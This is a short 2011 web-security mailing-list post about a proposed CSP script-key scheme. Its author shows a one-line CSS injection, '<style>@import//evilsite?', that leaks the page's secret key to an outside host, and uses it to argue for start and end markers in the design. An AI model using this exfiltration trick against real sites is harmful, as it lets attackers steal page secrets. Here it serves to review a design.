- From: gaz Heyes <gazheyes@gmail.com>
- Date: Fri, 28 Jan 2011 11:32:16 +0000
- To: Gervase Markham <gerv@mozilla.org>
- Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
Received on Friday, 28 January 2011 11:32:48 UTC
On 28 January 2011 11:18, Gervase Markham <gerv@mozilla.org> wrote: > <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script> > > But I agree that's a bit of a pain to do. We could make it so that the only > valid script-keys were ones which began "' ... ! > Ah wait hehe I already know how to send that data remotely:- INJECTION HERE <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script> Injection:- <style>@import//evilsite? So yeah well and truly pwnd, can we have start and end markers now? :D
Received on Friday, 28 January 2011 11:32:48 UTC